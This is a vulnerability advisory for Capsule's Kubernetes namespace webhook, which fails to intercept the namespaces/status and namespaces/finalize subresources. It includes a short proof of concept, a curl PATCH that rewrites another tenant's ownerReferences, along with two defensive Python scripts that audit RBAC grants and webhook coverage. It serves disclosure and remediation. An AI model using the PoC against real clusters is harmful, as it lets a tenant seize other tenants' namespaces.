Lack of data validation in github.com/projectcapsule/capsule
Description
Capsule Namespace Hijacking via subresource
Summary
To defend against namespace hijacking through update/patch operations on namespaces, Capsule validates update requests targeting namespaces with a webhook. In Kubernetes, however, the namespaces/finalize and namespaces/status subresource APIs can also modify fields of a namespace, including the metadata field, and the webhook defines no interception rules for these subresources. As a result, a tenant administrator who has permission to modify namespaces/status or namespaces/finalize can perform namespace hijacking.
Details
Capsule uses a ValidatingWebhookConfiguration to intercept changes to namespace resources, but it does not intercept modification requests made through the namespace subresource APIs (see: https://github.com/projectcapsule/capsule/blob/main/charts/capsule/templates/validatingwebhookconfiguration.yaml#L193). Through the subresource APIs it is still possible to modify the metadata field of a namespace, which enables hijacking.
PoC
Open two terminals and create two tenants:
kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: oil
spec:
  owners:
  - name: alice
...

kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: attacker
spec:
  owners:
  - name: attacker
...
When the attacker has permission to modify namespaces/status or namespaces/finalize, they can hijack namespaces belonging to other tenants. Here we grant the attacker the relevant permission:
kubectl create clusterrole status --verb=patch --resource=namespaces/status
kubectl create clusterrolebinding status --clusterrole=status --user=attacker
The attacker then sends a PATCH request to the namespaces/status subresource to hijack the namespace created by alice:
curl -k --cert ./attacker-attacker.crt --key attacker-attacker.key \
  --request PATCH 'https://192.168.201.12:6443/api/v1/namespaces/solar-production/status' \
  --header 'Content-Type: application/json-patch+json' \
  --data '[ { "op": "replace", "path": "/metadata/ownerReferences", "value": [ {...
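The precondition for the PoC is an RBAC grant of update or patch on namespaces/status or namespaces/finalize. The following audit lists which subjects hold such a grant so an operator can review them. This is an added example, not code from the Capsule project; it works on the dict shape of `kubectl get clusterroles,clusterrolebindings -o json`, and the ClusterRole and ClusterRoleBinding objects embedded below are constructed (the `status` role mirrors the grant shown above).

```python
"""Audit ClusterRoles/ClusterRoleBindings for write access to the namespace
subresources named in the advisory (namespaces/status, namespaces/finalize).

Added example, not Capsule's code. Inputs are the dict shape produced by
`kubectl get clusterroles,clusterrolebindings -o json`; the sample objects
at the bottom are constructed for this example.
"""

WRITE_VERBS = {"update", "patch"}
WATCHED = ("namespaces/status", "namespaces/finalize")


def _rbac_resource_matches(rule_resource, resource):
    """RBAC resource matching (note: differs from admission-webhook rules):
    '*' matches everything, subresources included; 'namespaces/*' matches
    every subresource of namespaces; otherwise an exact match is required."""
    parent, _, sub = resource.partition("/")
    return (rule_resource == "*" or rule_resource == resource
            or (bool(sub) and rule_resource == f"{parent}/*"))


def role_grants(role):
    """Return the set of (verb, resource) pairs in `role` that can write a
    watched namespace subresource in the core API group."""
    grants = set()
    for rule in role.get("rules", []):
        groups = rule.get("apiGroups", [])
        if "" not in groups and "*" not in groups:
            continue  # namespaces live in the core ("") group only
        verbs = set(rule.get("verbs", []))
        effective = WRITE_VERBS if "*" in verbs else verbs & WRITE_VERBS
        for resource in WATCHED:
            if any(_rbac_resource_matches(r, resource) for r in rule.get("resources", [])):
                grants.update((verb, resource) for verb in effective)
    return grants


def subjects_with_subresource_write(roles, bindings):
    """Map 'Kind/name' subjects to the risky (verb, resource) pairs they hold
    through ClusterRoleBindings. Cluster admins show up too; that is expected
    and the reviewer decides which subjects are legitimate."""
    by_name = {r["metadata"]["name"]: r for r in roles}
    findings = {}
    for binding in bindings:
        ref = binding.get("roleRef", {})
        if ref.get("kind") != "ClusterRole":
            continue
        role = by_name.get(ref.get("name"))
        if role is None:
            continue
        grants = role_grants(role)
        if not grants:
            continue
        for subject in binding.get("subjects", []):
            key = f"{subject['kind']}/{subject['name']}"
            findings.setdefault(key, set()).update(grants)
    return findings


# Constructed sample objects: the "status" role is the one created in the PoC.
SAMPLE_ROLES = [
    {"metadata": {"name": "status"},
     "rules": [{"apiGroups": [""], "resources": ["namespaces/status"], "verbs": ["patch"]}]},
    {"metadata": {"name": "ns-viewer"},
     "rules": [{"apiGroups": [""], "resources": ["namespaces"], "verbs": ["get", "list"]}]},
    {"metadata": {"name": "cluster-admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
]
SAMPLE_BINDINGS = [
    {"roleRef": {"kind": "ClusterRole", "name": "status"},
     "subjects": [{"kind": "User", "name": "attacker"}]},
    {"roleRef": {"kind": "ClusterRole", "name": "ns-viewer"},
     "subjects": [{"kind": "User", "name": "alice"}]},
    {"roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "system:masters"}]},
]

if __name__ == "__main__":
    for subject, grants in sorted(subjects_with_subresource_write(SAMPLE_ROLES, SAMPLE_BINDINGS).items()):
        print(subject, sorted(grants))
```

On a real cluster, feed the `items` arrays of the two `kubectl get ... -o json` outputs to `subjects_with_subresource_write`; namespaced RoleBindings cannot grant cluster-scoped namespace writes, so only ClusterRoleBindings are examined.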
Impact
Namespace hijacking: a tenant administrator with update/patch permission on namespaces/status or namespaces/finalize can take over namespaces that belong to other tenants.
Remediation
To mitigate this issue, add the following two subresources to the resources list in the ValidatingWebhookConfiguration rules (the subresources are named after the plural resource, namespaces/status and namespaces/finalize):
resources:
  - namespaces
  - namespaces/status
  - namespaces/finalize
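To confirm the remediation is in place on a cluster, one can check whether the deployed ValidatingWebhookConfiguration (as returned by `kubectl get validatingwebhookconfiguration <name> -o json`) intercepts UPDATE on both subresources. This is an added example, not Capsule's code; the webhook name and the two configurations below are constructed, one mirroring the shape of the vulnerable rule and one the remediated rule. The matching follows admissionregistration semantics, where `*` in `resources` matches every resource but no subresource and `*/*` matches both, which is why `namespaces` alone leaves the subresources unguarded.

```python
"""Check whether a ValidatingWebhookConfiguration intercepts the namespace
subresources named in the advisory (namespaces/status, namespaces/finalize).

Added example, not Capsule's code. The webhook name and both configurations
below are constructed for this example.
"""

NAMESPACE_SUBRESOURCES = ("namespaces/status", "namespaces/finalize")


def _group_matches(rule, group):
    groups = rule.get("apiGroups", [])
    return "*" in groups or group in groups


def _version_matches(rule, version):
    versions = rule.get("apiVersions", [])
    return "*" in versions or version in versions


def _operation_matches(rule, operation):
    ops = rule.get("operations", [])
    return "*" in ops or operation in ops


def _resource_matches(rule, resource):
    """Admission-webhook resource matching: '*' covers every resource but no
    subresource, '*/*' covers resources and subresources, 'namespaces/*'
    covers all subresources of namespaces, and 'namespaces/status' is exact."""
    parent, _, sub = resource.partition("/")
    for entry in rule.get("resources", []):
        if entry == resource or entry == "*/*":
            return True
        if sub and entry == f"{parent}/*":
            return True
        if not sub and entry == "*":
            return True
    return False


def uncovered_namespace_subresources(config, operation="UPDATE"):
    """Return the namespace subresources that no rule in any webhook of
    `config` intercepts for `operation`. The API server presents PATCH
    requests to admission as UPDATE, so UPDATE covers the PATCH in the PoC."""
    uncovered = []
    for resource in NAMESPACE_SUBRESOURCES:
        intercepted = any(
            _group_matches(rule, "") and _version_matches(rule, "v1")
            and _operation_matches(rule, operation)
            and _resource_matches(rule, resource)
            for webhook in config.get("webhooks", [])
            for rule in webhook.get("rules", [])
        )
        if not intercepted:
            uncovered.append(resource)
    return sorted(uncovered)


def _config(resources):
    # Constructed configuration; the webhook name is a placeholder.
    return {"webhooks": [{
        "name": "namespaces.webhook.example",
        "rules": [{"apiGroups": [""], "apiVersions": ["v1"],
                   "operations": ["CREATE", "UPDATE", "DELETE"],
                   "resources": resources}],
    }]}


VULNERABLE_CONFIG = _config(["namespaces"])
FIXED_CONFIG = _config(["namespaces", "namespaces/status", "namespaces/finalize"])

if __name__ == "__main__":
    print("vulnerable:", uncovered_namespace_subresources(VULNERABLE_CONFIG))
    print("fixed:     ", uncovered_namespace_subresources(FIXED_CONFIG))
```

An empty list from `uncovered_namespace_subresources` means every namespace subresource write reaches the webhook; any entry in the list names a path that still bypasses it.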
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
go | 0.13.0 |
Aliases
References